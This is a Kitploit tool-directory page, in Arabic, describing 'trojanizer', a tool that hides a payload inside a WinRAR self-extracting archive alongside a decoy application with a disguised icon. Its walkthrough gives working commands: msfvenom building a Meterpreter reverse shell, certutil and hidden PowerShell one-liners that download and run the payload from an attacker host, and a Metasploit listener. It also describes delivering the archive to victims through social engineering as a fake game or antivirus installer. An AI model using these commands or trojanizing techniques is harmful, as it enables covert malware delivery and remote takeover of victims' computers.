Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
trojanizer — تطعيم الحمولة الخاصة بك - أتمتة WinRAR (SFX) - تحت توزيعات لينكس | Kitploit
أدوات/GitHubGitHub/r00t-3xp10it/trojanizer
أدوات التصيدتوليد الحمولةالاستغلالالتهرب من IDS/IPSاختبار الاختراقالقيادة والسيطرةالهندسة الاجتماعيةالفريق الأحمرتطوير الحمولات
GitHubr00t-3xp10it/trojanizer

trojanizer

تطعيم الحمولة الخاصة بك - أتمتة WinRAR (SFX) - تحت توزيعات لينكس

29597منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Version Stage Build AUR

تروجانيزر

root@kitploit:~
إصدار الإصدار : v1.1 (مستقر)
المؤلف : pedro ubuntu [ r00t-3xp10it ]
الاسم الرمزي: Troia_Revisited
التوزيعات المدعومة: Ubuntu, Kali, Mint, Parrot OS
تطوير فريق RedTeam الخاص بـ Suspicious-Shell-Activity (SSA) ©2017

Trojanizer v1.1-Stable


وصف الإطار

root@kitploit:~
يستخدم أداة Trojanizer أداة WinRAR (SFX) لضغط الملفين اللذين أدخلهما المستخدم،
وتحويلهما إلى أرشيف SFX قابل للتنفيذ (.exe). عند تنفيذ أرشيف SFX،
سيتم تشغيل كلا الملفين (الحمولة الخاصة بنا والتطبيق الشرعي في نفس الوقت).

لجعل الأرشيف أقل إثارة للريبة لدى الهدف وقت التنفيذ، سيحاول Trojanizer
استبدال الأيقونة الافتراضية (.ico) لملف SFX بأيقونة يختارها المستخدم،
وإخفاء جميع رسائل بيئة الحماية لأرشيف SFX (Silent=1 | Overwrite=1).

'لن يقوم Trojanizer ببناء أحصنة طروادة، ولكن من منظور الهدف، فهو يحاكي سلوك حصان طروادة'
(تنفيذ الحمولة في الخلفية، بينما يتم تنفيذ التطبيق الشرعي في المقدمة).

Trojanizer v1.1-Stable




التبعيات (تطبيقات الخلفية)

root@kitploit:~
Zenity (واجهات Bash) | Wine (x86|x64) | WinRAr.exe (مثبت في Wine)
"سيقوم Trojanizer.sh بتنزيل وتثبيت جميع التبعيات حسب الحاجة"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
|        يُوصى بتحرير وتكوين الخيار: SYSTEM_ARCH=[ بنية_نظامك ]                               |
|        في ملف 'settings' قبل محاولة تشغيل الأداة لأول مرة.                                   |
╚────────────────────────────────────────────────────────────────────────────────────────────╝

Trojanizer v1.1-Stable


الحمولات (العوامل) المقبولة

root@kitploit:~
.exe | .bat | .vbs | .ps1
"جميع الحمولات التي يمكن لنظام Windows/SFX استخراجها وتنفيذها تلقائياً"

تلميح: إذا تم اختيار 'SINGLE_EXEC=ON' في ملف الإعدادات،
فإن Trojanizer سيقبل أي نوع من الامتدادات ليتم إدخالها.

التطبيقات الشرعية المقبولة (الإغراءات)

root@kitploit:~
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | إلخ ..
"جميع التطبيقات التي يمكن لنظام Windows/SFX استخراجها وتنفيذها تلقائياً"




الإعدادات المتقدمة

root@kitploit:~
╔─────────────────────────────────────────────────────────────────────────────────────────╗
|         الخيارات المتقدمة لـ Trojanizer متاحة فقط في ملف 'settings'،                      |
|       ولا يمكن تكوينها إلا قبل تشغيل الأداة الرئيسية (Trojanizer.sh)                      |
╚─────────────────────────────────────────────────────────────────────────────────────────╝

-- خيار الإعداد المسبق المتقدم
يمكن تكوين Trojanizer لتنفيذ برنامج + أمر قبل استخراج/تنفيذ الملفين المضغوطين (أرشيف SFX). يتيح ذلك للمستخدمين الاستفادة من البرامج المثبتة مسبقاً لتنفيذ أمر عن بُعد قبل حدوث الاستخراج الفعلي في نظام الهدف. إذا كان نشطاً، سيسأل Trojanizer (بيئة Zenity) عن الأمر المراد تنفيذه Trojanizer v1.1-Stable

-- تنفيذ ملف واحد
لننظر إلى السيناريو التالي: لديك حمولة dll لإدخالها تحتاج إلى تنفيذها عند الاستخراج، لكن أرشيفات SFX لا يمكنها تنفيذ ملفات dll مباشرةً. يتيح هذا الإعداد للمستخدمين إدخال سكريبت Batch واحد (.bat) سيتم استخدامه لتنفيذ حمولة dll. كل ما يحتاجه Trojanizer هو توجيه أرشيف SFX لاستخراج كلا الملفين ثم تنفيذ script.bat Trojanizer v1.1-Stable

root@kitploit:~
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
|  السلوك الافتراضي لمفتاح single_file_execution هو ضغط الملفين اللذين أدخلهما المستخدم         |
|  ولكن تنفيذ واحد منهما فقط وقت الاستخراج (سيتم تنفيذ الملف الثاني المُدخل) ..                    |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝



ترويانتجاوز القائمة البيضاء للتطبيقات باستخدام Trojanizer

root@kitploit:~
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|   تم إنجاز الكثير من العمل الرائع من قبل الكثير من الأشخاص، وخاصة @subTee، بخصوص تجاوز القائمة البيضاء للتطبيقات   |
|   وهو ما نريده في النهاية هنا: تنفيذ تعليمات برمجية عشوائية باستخدام الملفات الثنائية المضمنة من مايكروسوفت.        |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝

يصف التمرين التالي كيفية استخدام مفتاحي Trojanizer المتقدمين 'single_file_execution' و 'Presetup' لإسقاط
(تنزيل عن بُعد) وتنفيذ أي حمولة باستخدام أسطر أوامر تجاوز القائمة البيضاء للتطبيقات 'certutil' أو 'powershell'..


1º - استخدام metasploit لبناء حمولتنا
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - نسخ payload.exe إلى جذر الويب لـ apache2 وبدء الخدمة
     cp payload.exe /var/www/html/payload.exe
     service apache2 start

3º - تحرير ملف 'settings' الخاص بـ Trojanizer وتفعيل:
     PRE_SETUP=ON
     SINGLE_EXEC=ON

4º - تشغيل أداة Trojanizer
     الحمولة المراد ضغطها => <path-to>/screenshot.png (لن يهم ما تضغطه)
     تنفيذ هذا الملف عند الاستخراج => <path-to>/AngryBirds.exe (ليتم تنفيذه كتطبيق إغراء)
     مربع الحوار للإعداد المسبق => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
     اسم ملف SFX => AngryBirds_installer (اسم أرشيف SFX المراد إنشاؤه)
     استبدال الأيقونة => Windows-Store.ico أو Steam-logo.ico

5º - بدء مستمع، وإرسال أرشيف SFX إلى الهدف باستخدام الهندسة الاجتماعية
     msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'


╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|      عند تنفيذ أرشيف SFX، سيقوم بتنزيل payload.exe من خادم apache2 الخاص بنا إلى الهدف و                         |
|    تنفيذه قبل استخراج 'screenshot.png' و 'AngryBirds.exe' (سيتم تنفيذ الأخير ليعمل كإغراء)                         |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝


يستخدم سطر الأوامر التالي طريقة 'powershell(Downloadfile+start)' لتحقيق نفس النتيجة كما في تمرين 'certutil' السابق ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

يستخدم سطر الأوامر التالي طريقة 'powershell(IEX+downloadstring)' لتحقيق نفس الشيء تقريباً (لا يلمس payload.ps1 القرص)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"




التحميل/التثبيت

root@kitploit:~
1º - تنزيل الإطار من GitHub
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - تعيين أذونات تنفيذ الملفات
     cd trojanizer
     sudo chmod +x *.sh

3º - تكوين الإطار
     nano settings

4º - تشغيل الأداة الرئيسية
     sudo ./Trojanizer.sh




لقطات شاشة للإطار

xsf.conf - تنفيذ كلا الملفين عند الاستخراج (سلوك حصان طروادة) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (خيارات متقدمة) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX) Trojanizer v1.1-Stable
أرشيف SFX النهائي مع أيقونة معدلة
Trojanizer v1.1-Stable
داخل أرشيف SFX (فتح باستخدام WinRAR) - سلوك حصان طروادة
Trojanizer v1.1-Stable
داخل أرشيف SFX (فتح باستخدام WinRAR) - single_file_execution
Trojanizer v1.1-Stable




دروس فيديو

Trojanizer - مثبت مزيف لمكافح الفيروسات AVG (سلوك حصان طروادة)
https://www.youtube.com/watch?v=BIn6_ccZrI0

Trojanizer - single_file_execution (ليس سلوك حصان طروادة)
https://www.youtube.com/watch?v=Ze0JkVtKbns



شكر خاص:

@subTee | @enigma0x3 | @H4d3s (SSA)

المراجع:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

الإبلاغ عن الأخطاء:

https://github.com/r00t-3xp10it/trojanizer/issues

-- Suspicious-Shell-Activity© (SSA) RedTeam develop @2017 --

تنزيل الأداة